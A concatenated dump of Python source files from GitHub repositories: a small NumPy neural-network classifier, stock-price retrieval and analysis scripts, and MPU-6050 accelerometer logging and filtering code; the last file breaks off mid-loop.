    return np.array([(float(e.x), float(e.y)) for e in elements]).T
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,428
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/neural/__init__.py
|
from .deep import *
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,429
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/__init__.py
|
from .models import *
from .datagen import *
from .reports import *
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,430
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/reports.py
|
from datetime import datetime
def save_report(weights, biases, train_accuracy, test_accuracy, time_elapsed, train_size, test_size,
                generations) -> None:
    """
    Saves a report to the reports directory.

    The file is named after the current timestamp so successive runs never
    overwrite each other.
    """
    lines = ['****************** The Deep Network Report ******************\n',
             '\n',
             'Weights:\n']
    for ind, weight in enumerate(weights):
        lines.append("W[{}] = {}\n".format(ind, weight))
    lines.append('\n')
    lines.append('Bias:\n')
    for ind, bias in enumerate(biases):
        lines.append("b[{}] = {}\n".format(ind, bias))
    lines.append('\n')
    lines.append(f'Train accuracy = {train_accuracy}%\n')
    lines.append(f'Test accuracy = {test_accuracy}%\n')
    lines.append('\n')
    lines.append("Time elapsed = {:.4f}ms\n".format(time_elapsed))
    lines.append('\n')
    lines.append(f'Train data size = {train_size} entities\n')
    lines.append(f'Test data size = {test_size} entities\n')
    lines.append(f'Generations (epochs) of the training = {generations}\n')
    with open(f'reports/{datetime.now().strftime("%d-%m-%Y-%H-%M-%S")}.txt', 'w') as f:
        f.write(''.join(lines))
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,431
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/models.py
|
import random
import time
# Seed the shared RNG with wall-clock time so each run generates a different
# random dataset.
random.seed(time.time())
class Element:
    """A single 2-D data point with a binary class label.

    Coordinates default to Gaussian noise around the origin; the label
    defaults to whether the point falls inside the circle of radius 0.5.
    """

    def __init__(self, x=None, y=None, value=None):
        # Compare against None explicitly: the original used truthiness, so a
        # legitimate 0 / 0.0 coordinate or a 0 label was silently replaced by
        # a random coordinate or a recomputed label.
        self.x = x if x is not None else random.gauss(0, .4)
        self.y = y if y is not None else random.gauss(0, .4)
        self.value = value if value is not None else self.get_value()

    def __str__(self) -> str:
        """
        Returns a string representation of an Element instance.
        :return: string
        """
        return f'{self.x},{self.y},{self.value}\n'

    def get_value(self) -> int:
        """
        Returns 1 if (x,y) belongs to upper subclass, 0 - if lower.
        :return: 1 or 0
        """
        return 1 if (self.x * self.x + self.y * self.y) < .25 else 0
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,432
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/neural/deep.py
|
from utils import *
from plotter import plot, graph
import time
import numpy as np
# Seed NumPy's RNG from the wall clock so each run initializes different weights.
np.random.seed(int(time.time()))
class DeepNetwork:
    """A small fully-connected network (2-10-1 neurons) trained with batch
    gradient descent to separate two classes of 2-D points."""
    # Step size used by gradient descent in correct_weights().
    learning_rate = 0.25
    def __init__(self, filepath=None, size=100):
        # 2 neurons in the input layer.
        # 10 neurons in the hidden layer.
        # 1 neuron in the output layer.
        self.layer_sizes = [2, 10, 1]
        self.weights = []
        self.biases = []
        for index, layer_size in enumerate(self.layer_sizes):
            # Skip initializing for the input layer.
            if index == 0:
                continue
            # Initialize weight matrices and bias vectors.
            self.weights.append(np.random.randn(layer_size, self.layer_sizes[index - 1]) * 0.01)
            self.biases.append(np.zeros((layer_size, 1)))
        # Load the dataset from disk when a path is given; otherwise generate one.
        if filepath:
            self.X, self.X_test, self.Y_hat, self.Y_hat_test = read_from_file(filepath)
        else:
            self.X, self.X_test, self.Y_hat, self.Y_hat_test = generate_random_data(size)
    def train(self):
        """
        Trains deep neural network. Saves the results and plots them.
        """
        generations = 20000
        losses = []
        tic = time.time()
        for gen in range(generations):
            # Forward prop, backward prop and weights correction.
            A, cache_results = self.forward_propagation(self.X)
            derivatives = self.backward_propagation(cache_results, A)
            self.correct_weights(derivatives)
            loss = self.loss(self.Y_hat, A)
            losses.append(loss)
        toc = time.time()
        # Gather results after training.
        train_accuracy = self.get_accuracy(self.Y_hat, self.predict(self.X))
        test_accuracy = self.get_accuracy(self.Y_hat_test, self.predict(self.X_test))
        time_elapsed = toc - tic
        train_size = self.X.shape[1]
        test_size = self.X_test.shape[1]
        save_report(self.weights, self.biases, train_accuracy, test_accuracy, time_elapsed, train_size, test_size,
                    generations)
        graph(losses)
        X, P = self.get_data_for_decision_boundary()
        plot(self.X, self.Y_hat, X, P, 'Train Set')
        plot(self.X_test, self.Y_hat_test, X, P, 'Test Set')
    def forward_propagation(self, X) -> (np.ndarray, list):
        """
        Does forward propagation.
        :param X: input data
        :type X: numpy array (k,m)
        :return: network's output and cached intermediate results
        """
        cache_results = []
        layers_amount = len(self.weights)
        # Iterate over first L-1 layers and do RELU forward propagation.
        for index in range(layers_amount - 1):
            Z = self.z(self.weights[index], X, self.biases[index])
            A = self.relu(Z)
            # NOTE: relu() mutates Z in place, so the cached Z is already
            # rectified (negatives zeroed); backward_propagation relies on that.
            cache_results.append((X, Z))
            X = A
        # Do the last sigmoid layer separately.
        Z = self.z(self.weights[layers_amount - 1], X, self.biases[layers_amount - 1])
        A = self.sigmoid(Z)
        cache_results.append((X, Z))
        return A, cache_results
    def backward_propagation(self, cache_results, A) -> list:
        """
        Does backward propagation.
        :param cache_results: cached results for derivatives calculation
        :type cache_results: list
        :param A: network's output
        :type A: numpy array(1,m)
        :return: list of derivatives as tuples, ordered last layer first
                 (correct_weights indexes the list in reverse to compensate)
        """
        derivatives = []
        layers_amount = len(self.weights)
        # Do backward propagation for the last sigmoid layer separately.
        d_z = A - self.Y_hat
        d_w = 1 / d_z.shape[1] * np.dot(d_z, cache_results[layers_amount - 1][0].T)
        d_b = 1 / d_z.shape[1] * np.sum(d_z, axis=1, keepdims=True)
        d_a = np.dot(self.weights[layers_amount - 1].T, d_z)
        derivatives.append((d_w, d_b))
        # Iterate over first L-1 layers and do RELU backward propagation.
        for layer in reversed(range(layers_amount - 1)):
            # Build the ReLU derivative mask: the cached Z was already
            # rectified in the forward pass, so zeroed entries stay 0 and
            # positive entries become 1.
            Z = cache_results[layer][1]
            Z[Z < 0] = 0
            Z[Z > 0] = 1
            d_z = np.multiply(d_a, Z)
            d_w = 1 / d_z.shape[1] * np.dot(d_z, cache_results[layer][0].T)
            d_b = 1 / d_z.shape[1] * np.sum(d_z, axis=1, keepdims=True)
            d_a = np.dot(self.weights[layer].T, d_z)
            derivatives.append((d_w, d_b))
        return derivatives
    def correct_weights(self, derivatives) -> None:
        """
        Adds the anti-gradient to the weights and biases.
        :param derivatives: tuples with derivatives for respective layers,
            ordered last layer first (as produced by backward_propagation)
        :type derivatives: list
        :return: None
        """
        # derivatives is last-layer-first, so index from the end to match
        # the first-layer-first ordering of self.weights/self.biases.
        for i in range(len(derivatives)):
            self.weights[i] -= self.learning_rate * derivatives[len(derivatives) - i - 1][0]
            self.biases[i] -= self.learning_rate * derivatives[len(derivatives) - i - 1][1]
    def z(self, W, X, b) -> np.ndarray:
        """
        Performs a linear transformation of the data.
        :param X: input matrix
        :param W: weights matrix
        :param b: bias vector
        :type X: np.ndarray(n,m)
        :type W: np.ndarray(k,n)
        :type b: np.ndarray(k,1)
        :return: the numpy array(k,m) of linear transforms
        """
        return np.dot(W, X) + b
    def relu(self, Z) -> np.ndarray:
        """
        Applies the RELU to the Z array.
        NOTE: mutates Z in place and returns the same array.
        :param Z: linear transforms Z of the data
        :type Z: np.ndarray(k,m)
        :return: the numpy array(k,m) of RELU images
        """
        Z[Z < 0] = 0
        return Z
    def sigmoid(self, Z) -> np.ndarray:
        """
        Applies the sigmoid to the Z array.
        :param Z: linear transforms Z of the data
        :type Z: np.ndarray(k,m)
        :return: the numpy array(k,m) of sigmoid images
        """
        return 1 / (1 + np.exp(-Z))
    def loss(self, Y_hat, Y) -> float:
        """
        Calculates cross-entropy averaged across a generation.
        The 1e-5 terms guard against log(0).
        :param Y_hat: the real values
        :type Y_hat: np.ndarray(1,n)
        :param Y: network's guessed values
        :type Y: np.ndarray(1,n)
        :return: averaged cross-entropy
        """
        Y_hat = Y_hat.reshape(1, Y_hat.shape[0])
        return np.sum(-Y_hat * np.log(Y + 1e-5) - (1 - Y_hat) * np.log(1 - Y + 1e-5)) / Y.shape[1]
    def predict(self, X) -> np.ndarray:
        """
        Processes the data on the trained network and returns a prediction array.
        :param X: input layer data
        :type X: np.ndarray(m,n)
        :return: prediction P array for X
        """
        Y, _ = self.forward_propagation(X)
        # Threshold the sigmoid output at 0.5 to obtain binary class labels.
        P = np.array([1 if y > 0.5 else 0 for y in Y[0]])
        return P
    def get_accuracy(self, Y_hat, P) -> float:
        """
        Compares values of Y_hat and P and returns accuracy in %.
        :param Y_hat: the real values
        :type Y_hat: np.ndarray(1,m)
        :param P: network's predicted values
        :type P: np.ndarray(1,m)
        :return: accuracy of the P
        """
        # NOTE(review): assumes Y_hat is 1-D so shape[0] equals the number of
        # samples - holds for arrays produced by split_data.
        return (1 - np.sum(np.abs(Y_hat - P)) / Y_hat.shape[0]) * 100
    def get_data_for_decision_boundary(self) -> (np.ndarray, np.ndarray):
        """
        Returns X - an array of all points in [-1;1] x [-1;1] grid square.
        Returns P - an array of predictions for the array X.
        This data is used to plot the decision boundary.
        """
        # 200x200 grid with 0.01 spacing covering the unit square.
        x, y, X = -1., -1., []
        for i in range(200):
            for j in range(200):
                X.append([x, y])
                x += 0.01
            x = -1.
            y += 0.01
        X = np.array(X).T
        P = self.predict(X)
        return X, P
    def predict_from_file(self, filepath):
        """
        Predicts for the data in <filepath>.
        :param filepath: path of the file
        :type filepath: string
        """
        X = read_for_prediction(filepath)
        P = self.predict(X)
        print(f'Prediction array for [{filepath}]:\n{P}')
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,433
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/run.py
|
from neural import DeepNetwork
# Train on 100 randomly generated points, then classify the points listed in
# data/predict.txt with the trained network.
deep_network = DeepNetwork(size=100)
deep_network.train()
deep_network.predict_from_file('data/predict.txt')
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,434
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/plotter/graph.py
|
import matplotlib.pyplot as plt
def plot(X, Y, Xp, Pp, title):
    """Draw the decision-boundary grid and the labelled data, then show the figure."""
    boundary_points = Xp.T.tolist()
    boundary_labels = Pp.T.tolist()
    data_points = X.T.tolist()
    data_labels = Y.tolist()
    # Pale colours for the boundary grid so the real data stands out on top.
    scatter(boundary_points, boundary_labels, '#FDE8D2', '#D0E9E9', title)
    scatter(data_points, data_labels, '#ff9933', '#00e6e6', title)
    plt.show()
def scatter(X, Y, color1, color2, title):
    """Scatter the points of X on the current axes, coloured by their label in Y."""
    # Partition the points by label: truthy labels get color1, the rest color2.
    positives = [pt for ind, pt in enumerate(X) if Y[ind]]
    negatives = [pt for ind, pt in enumerate(X) if not Y[ind]]
    axes = plt.gca()
    axes.set_xlim([-1, 1])
    axes.set_ylim([-1, 1])
    plt.scatter([p[0] for p in positives], [p[1] for p in positives], c=color1, s=15)
    plt.scatter([p[0] for p in negatives], [p[1] for p in negatives], c=color2, s=15)
    plt.xlabel('x')
    plt.ylabel('y')
    plt.title(title)
def graph(losses):
    """
    Plots the graph of the loss function.
    """
    # Axis limits match the training setup: 20000 generations, loss in [0, 1].
    axes = plt.gca()
    axes.set_xlim([0, 20000])
    axes.set_ylim([0, 1])
    plt.plot(losses, c='r')
    plt.show()
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,435
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/data_requests.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 18:16:41 2018
@author: James
"""
import requests
import pandas as pd
import matplotlib.pyplot as plt
import re
import numpy as np
def make_request(ticker, function = 'TIME_SERIES_DAILY',
                 api_key = '',
                 outputsize = 'compact',
                 **kwargs):
    """
    Makes a request to the Alpha Vantage API for daily time-series data.

    :param ticker: stock symbol to query
    :param function: Alpha Vantage API function name
    :param api_key: API key; read from apikey.txt when empty
    :param outputsize: 'compact' (recent points) or 'full'
    :param kwargs: extra query parameters forwarded to the API
    :return: pandas DataFrame indexed by date (oldest first), or None when the
             request fails
    """
    if not api_key:
        api_key = read_key()
    url = "https://www.alphavantage.co/query"
    params = {'symbol' : ticker,
              'function' : function,
              'apikey' : api_key,
              'outputsize' : outputsize}
    params = {**params, **kwargs}
    results = requests.get(url, params = params)
    # requests.Response is falsy for 4xx/5xx status codes.
    if not results:
        return None
    results = results.json()
    time_series = results['Time Series (Daily)']
    datas = [time_series[time_point] for time_point in time_series]
    time_points = [pd.to_datetime(time_point) for time_point in time_series]
    df = pd.DataFrame(datas, time_points, dtype = float)
    # Ensure chronological (oldest-first) ordering regardless of API order.
    if time_points[0] > time_points[1]:
        df = df.reindex(index=df.index[::-1])
    for column in df.columns:
        # Strip the numeric prefix, e.g. '1. open' -> 'open'. The dot is now
        # escaped; the original pattern r'\d.\s+' let '.' match any character.
        new_column = re.sub(r'\d\.\s+', '', column)
        df.rename(columns = {column : new_column}, inplace = True)
    return df
def read_key():
    """Return the API key string stored in apikey.txt."""
    with open('apikey.txt') as txt_file:
        return txt_file.read()
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,436
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/analysis_methods.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 14 18:20:17 2018
@author: James
"""
import numpy as np
import matplotlib.pyplot as plt
def percent_match(col = 'adjusted close', df = None,
                  window = 5, offset = 0):
    """
    Get the trend of the last 10 days.
    Compare against the last X years of data.
    Keep the top 20% of matches. If there's a >50% chance of
    increase in money then buy. If there's a > 50% chance of
    loss then short.
    """
    w_df = df[col]
    # A non-zero offset truncates the series (e.g. offset=-5 drops the last 5 rows).
    if offset:
        w_df = w_df[0 : offset]
    number_of_days = (252 * 4) # 252 trading days * 4 ~= four trading years
    # Work with daily percentage changes; drop infinities and NaNs.
    w_df = w_df.pct_change()
    w_df = w_df.replace([np.inf, -np.inf], np.nan)
    w_df = w_df.dropna()
    # The most recent `window` changes are the pattern we match against history.
    working_array = w_df[-window::]
    cut_off = w_df.mean()
    index = 0
    scores = {}
    all_scores = []
    plt.plot(np.arange(len(working_array)), working_array)
    # NOTE(review): `time` here is a daily pct-change value, not the time module.
    for time in w_df[-number_of_days : -window]:
        test_array = w_df[index: index + window]
        try:
            # Lower score = closer match to the recent window.
            score = __abs_difference(test_array, working_array)
            next_day = w_df[index+1]
            diff = next_day - time
            # Only keep windows followed by a move larger than the mean change.
            if np.abs(diff) > cut_off:
                scores[index] = {'score' : score, 'Dir': diff > 0, 'points':test_array} #True = increase, False = decrease
                all_scores.append(score)
                plt.plot(np.arange(len(working_array)), test_array)
        except ValueError as e:
            # __abs_difference rejects windows containing zeros.
            print(e)
        index += 1
    all_scores = np.array(all_scores)
    # Keep the closest 25% of matches (smallest scores).
    top_lot = np.percentile(all_scores, 25)
    final_counts = {'up' : 0, 'down' : 0}
    for index in scores:
        score = scores[index]['score']
        if score <= top_lot:
            if scores[index]['Dir']:
                final_counts['up'] += 1
            else:
                final_counts['down'] += 1
            plt.plot(np.arange(len(working_array)), scores[index]['points'])
    return final_counts
def __abs_difference(arr1, arr2):
    """Sum of element-wise absolute differences; rejects arrays containing zeros."""
    for arr in (arr1, arr2):
        if (arr == 0).any():
            raise ValueError('Has a zero' + str(arr))
    return np.sum(np.abs(arr1 - arr2))
def follow_trend(df, col = 'adjusted close', big_range = 30 , small_range = 10):
    """
    Compare the short-window average price against a longer-window average:
    the trend is 'up' (buy) when the short average is higher, 'down' (short)
    otherwise. The ratio of the two averages is returned as well.
    """
    prices = df[col]
    short_avg = prices[-small_range::].mean()
    long_avg = prices[-big_range::].mean()
    trend = 'up' if short_avg > long_avg else 'down'
    return {'Ratio': short_avg / long_avg, 'Trend': trend}
if __name__ == '__main__':
    import data_requests
    #df = data_requests.make_request('^FTSE', 'TIME_SERIES_DAILY_ADJUSTED',
    #outputsize = 'full')
    # NOTE(review): the assignment above is commented out, so `df` is undefined
    # here and running this module as a script raises NameError.
    results = follow_trend(df)
    print(results)
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,437
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/analyse.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 14 18:21:00 2018
@author: James
"""
import data_requests
import analysis_methods
# Fetch the full FTSE daily history and score how often recent 5-day patterns
# historically preceded a rise vs a fall.
df = data_requests.make_request('^FTSE', 'TIME_SERIES_DAILY_ADJUSTED',
                                outputsize = 'full')
# NOTE(review): 'D' is passed as the `col` argument - presumably a column name;
# confirm a column named 'D' exists in the returned frame.
s = analysis_methods.percent_match('D' , df = df, offset = -5)
#plt.plot(df['open'])
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,438
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/retrieve_stock_data.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 27 14:03:15 2021
@author: james
"""
#stocks available: https://globefunder.com/revolut-stocks-list/
import yfinance as yf
import datetime
import shelve
import re
from dataclasses import dataclass
@dataclass
class stock:
    """Represents a single listed company and its market metadata.

    All fields are stored as strings, exactly as read from the CSV listing.
    The dataclass decorator generates the constructor; the old hand-written
    __init__ that was left behind as a commented-out string literal has been
    removed.
    """
    company: str = ''
    symbol: str = ''
    price: str = ''
    market_cap: str = ''
    sector: str = ''
    industry: str = ''
    market: str = ''
def read_available_stocks(path='Revolut Stocks List - Revolut stocks list.csv'):
    """
    Read the list of stocks from the Revolut stocks list CSV.

    :param path: CSV file to read; defaults to the bundled Revolut listing
        (the filename was previously hard-coded inside the function)
    :return: dict mapping company name -> stock instance
    """
    stocks = {}
    with open(path, 'r') as csv_file:
        csv_file.readline()  # skip the header row
        for line in csv_file:
            # Remove thousands separators inside dollar amounts
            # ("$1,234" -> "$1234") so the naive comma split below does not
            # break fields apart.
            results = re.findall(r'\$\d+,\d', line)
            if len(results) > 0:
                for result in results:
                    wo_comma = result.replace(',', '')
                    line = line.replace(result, wo_comma)
            # Same for bare numbers with separators ("1,234" -> "1234").
            results = re.findall(r'\d,\d', line)
            if len(results) > 0:
                for result in results:
                    wo_comma = result.replace(',', '')
                    line = line.replace(result, wo_comma)
            split_line = line.split(',')
            this_stock = stock()
            this_stock.company = split_line[1]
            this_stock.symbol = split_line[2]
            this_stock.price = split_line[3]
            this_stock.market_cap = split_line[4]
            this_stock.sector = split_line[5]
            this_stock.industry = split_line[6]
            this_stock.market = split_line[7]
            stocks[this_stock.company] = this_stock
    return stocks
def get_data(stock, months = 0, weeks = 0, days = 0):
    """Request the data from yfinance"""
    # Download daily data from the computed start date up to today.
    dt = get_past_datetime_ago(months, weeks, days)
    df = yf.download(stock.symbol, start=dt, progress=False)
    return df
def get_past_datetime_ago(months, weeks, days):
    """Get datetime from the number of months, weeks, and days before now"""
    # Approximate a month as 365/12 days; exact calendar months are not needed.
    total = months * (365 / 12) + weeks * 7 + days
    return datetime.datetime.now() - datetime.timedelta(total)
def get_all_dfs(stocks, months):
    """Try to retrieve the price history for every stock.

    :param stocks: dict of company name -> stock
    :param months: how many months of history to request
    :return: dict of company name -> price DataFrame (failed downloads are skipped)
    """
    dfs = {}
    count = 0
    total = len(stocks)
    for company in stocks:
        try:
            stock = stocks[company]
            df = get_data(stock, months)
            dfs[stock.company] = df
        except Exception as e:
            # Best-effort bulk download: log the failure and keep going.
            print(f"Error getting {stock.company}:{e}")
            print(f"count: {count}")
        count+=1
        if count % 20 == 0:
            # Progress message; fixed the "Done X or Y" typo ("of").
            print(f"Done {count} of {total}")
    return dfs
def get_all_data_frames(new_data = False, months = 18):
    """
    Get dataframes of all stocks. If new_data then we actually request the
    data from yfinance; otherwise we use the saved (shelved) data.

    :param new_data: when True, re-download and cache; when False, load the cache
    :param months: months of history to request on a fresh download
    :return: (dfs, stocks) - price frames and stock metadata keyed by company
    """
    if new_data:
        stocks = read_available_stocks()
        # Pass the caller's horizon through; the original hard-coded 18 here,
        # silently ignoring the `months` parameter.
        dfs = get_all_dfs(stocks, months)
        with shelve.open('stocks') as db:
            db['stocks'] = stocks
            db['dfs'] = dfs
    else:
        with shelve.open('stocks') as db:
            stocks = db['stocks']
            dfs = db['dfs']
    return dfs, stocks
def plot(company, dfs):
    # Plot the adjusted closing price history for one company.
    dfs[company]['Adj Close'].plot()
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,439
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/analyse_stock_data.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 27 14:03:15 2021
@author: james
"""
import retrieve_stock_data as rsd
import numpy as np
def get_biggest_changes(dfs, days = -1):
    """
    Get the stocks that have changed the most in the given timeframe,
    based on the average over the given period.
    Note we're assuming the dataframe rows represent days.
    """
    changes = get_percentage_changes(dfs, days)
    return determine_biggest_changes(changes)
def get_percentage_changes(dfs, days):
    """
    Calculate the percentage difference between each stock's latest price and
    its average price over the given period.

    :param dfs: dict of company -> DataFrame with an 'Adj Close' column
    :param days: number of trailing rows to consider, or -1 for the whole frame
    :return: dict of company -> percentage change
    """
    changes = {}
    for company in dfs:
        df = dfs[company]
        close_prices = df['Adj Close']
        if(len(close_prices)) ==0:
            continue
        if days != -1:
            length = len(close_prices)
            close_prices = close_prices[(length - days)::]
        try:
            mean = close_prices.mean()
            # Use positional indexing: after the slice above, the label
            # `len(close_prices) - 1` no longer refers to the last row, so the
            # original `close_prices[len(close_prices) - 1]` silently picked
            # the wrong element.
            cur = close_prices.iloc[-1]
            per = (cur - mean)/mean * 100
            changes[company] = per
        except Exception as e:
            print(f"Error getting {company}:{e}")
    return changes
def determine_biggest_changes(changes):
    """
    Sort companies by their percentage change and return the 20 largest
    risers and the 20 largest fallers as two separate lists.
    """
    companies = list(changes)
    order = np.argsort(np.array([changes[c] for c in companies]))
    decreases = [companies[i] for i in order[0:20]]
    increases = [companies[i] for i in order[::-1][0:20]]
    return increases, decreases
# Load the cached data and report the biggest movers over roughly six months.
dfs, stocks = rsd.get_all_data_frames()
most_increased, most_decreased = get_biggest_changes(dfs, 6*30)
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,442
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0020_stream_to_file.py
|
#!/usr/bin/python
import smbus
import numpy as np
import helpers as helpers
import time
import pickle
# Register
# MPU-6050 power-management register addresses - TODO confirm against the
# device's register map.
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(reg):
    # Read a single byte from the given register over I2C.
    return bus.read_byte_data(address, reg)
def read_word(reg):
    """Read a big-endian 16-bit word starting at the given register."""
    high = bus.read_byte_data(address, reg)
    low = bus.read_byte_data(address, reg + 1)
    return (high << 8) + low
def read_word_2c(reg):
    """Read a 16-bit word and interpret it as a signed (two's complement) value."""
    raw = read_word(reg)
    # Values with the high bit set represent negative numbers.
    return raw - 0x10000 if raw >= 0x8000 else raw
bus = smbus.SMBus(1) # bus = smbus.SMBus(0) for Revision 1 boards
address = 0x68 # via i2cdetect
# Activate to be able to address the module
bus.write_byte_data(address, power_mgmt_1, 0)
# File:
file_name = 'capture_0010.mpudat'
# Layout: [0]=timestamp ms, [1:4]=angles, [4:7]=gyro, [7:10]=acc
measurement = np.zeros((10,)) # angles,gyro,acc,t
# this erase/initiates the file
with open(file_name, 'wb') as f:
    np.save(f, measurement)
# Sample forever, appending one np.save record per iteration.
while True:
    # 131 LSB/(deg/s) and 16384 LSB/g are the default full-scale
    # sensitivities - TODO confirm against the configured ranges.
    gyro_x = read_word_2c(0x43) / 131
    gyro_y = read_word_2c(0x45) / 131
    gyro_z = read_word_2c(0x47) / 131
    acc_x = read_word_2c(0x3b) / 16384.0
    acc_y = read_word_2c(0x3d) / 16384.0
    acc_z = read_word_2c(0x3f) / 16384.0
    # convert to Angles and Angular Velocities:
    factor = 180/np.pi # set to 1 if output in radians.
    roll, pitch, yaw = helpers.get_roll_pitch_yaw(acc_x, acc_y, acc_z, factor=factor)
    measurement[0] = int(round(time.time() * 1000))
    measurement[1:4] = np.array([roll, pitch, yaw])
    measurement[4:7] = np.array([gyro_x, gyro_y, gyro_z])
    measurement[7:10] = np.array([acc_x, acc_y, acc_z])
    with open(file_name, 'ab') as f:
        np.save(f,measurement)
    print(measurement)
    time.sleep(0.001)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,443
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/test.py
|
# TODO:
# Stream to a file, and plot the raw data in degrees and rad/sec
import time
import pickle
import numpy as np
# Scratch script: verify that measurements pack into a 10-slot vector and that
# multiple np.save calls to one file can be read back sequentially.
roll = 1.4
pitch = 2.3
yaw = 3.0
measurement = np.zeros((10,))
measurement[1:4] = np.array([roll, pitch, yaw])
measurement[4:7] = np.array([roll, pitch, yaw])
measurement[7:10] = np.array([roll, pitch, yaw])
print(measurement)
file_name = 't.t'
from pathlib import Path
import numpy as np
import os
p = Path('temp.npy')
# Append two arrays to the same file with consecutive np.save calls.
with p.open('ab') as f:
    np.save(f, np.zeros(2))
    np.save(f, np.ones(2))
with p.open('rb') as f:
    fsz = os.fstat(f.fileno()).st_size
    out = np.load(f)
    # Keep loading arrays until the file position reaches end-of-file.
    while f.tell() < fsz:
        out = np.vstack((out, np.load(f)))
print(out)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,444
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0038_display_offline.py
|
import numpy as np
import pickle
import matplotlib
import tkinter as tk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import style
import helpers as helpers
import filters as filters
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, _, w = helpers.get_data_from_file(file_name, degrees=True)
# --------------------------------------------------------------------------------------------------------------------
# Sensor fusion:
# --------------------------------------------------------------------------------------------------------------------
w_0 = np.zeros((3, 1))
# remove initial bias (Assume it starts static)
w = w - w[:, 1:2]
# NOTE(review): w_0 is immediately overwritten here, so the zeros above are unused.
w_0 = w[:, 2]
comp_filter = filters.ComplementaryFilter(x_0=np.zeros((3, 1)), w_0=w_0, alpha=0.9)
kf_filter = filters.KalmanFilter(sigma_angles=3**2, sigma_w=2**2)
# Pre-allocate per-sample outputs: fused angles and rotated cube corners.
cf_angles = np.zeros((3, t.shape[0]))
kf_angles = np.zeros((3, t.shape[0]))
pts_cf = np.zeros((3, 8, t.shape[0]))
pts_kf = np.zeros((3, 8, t.shape[0]))
pts_acc = np.zeros((3, 8, t.shape[0]))
for t_idx in range(1, t.shape[0]):
    dt = t[t_idx] - t[t_idx-1]
    comp_filter.update(angles_=angles[:, t_idx], w_=w[:, t_idx], dt_=dt)
    kf_filter.process(dt=dt, ac_angles_i=angles[:, t_idx], gr_W_i=w[:, t_idx])
    # get the values from the filters:
    cf_angles[:, t_idx] = comp_filter.x[:, 0]
    kf_angles[:, t_idx] = kf_filter.kf_angles[:, 0]
    # rotate the points to plot one by one:
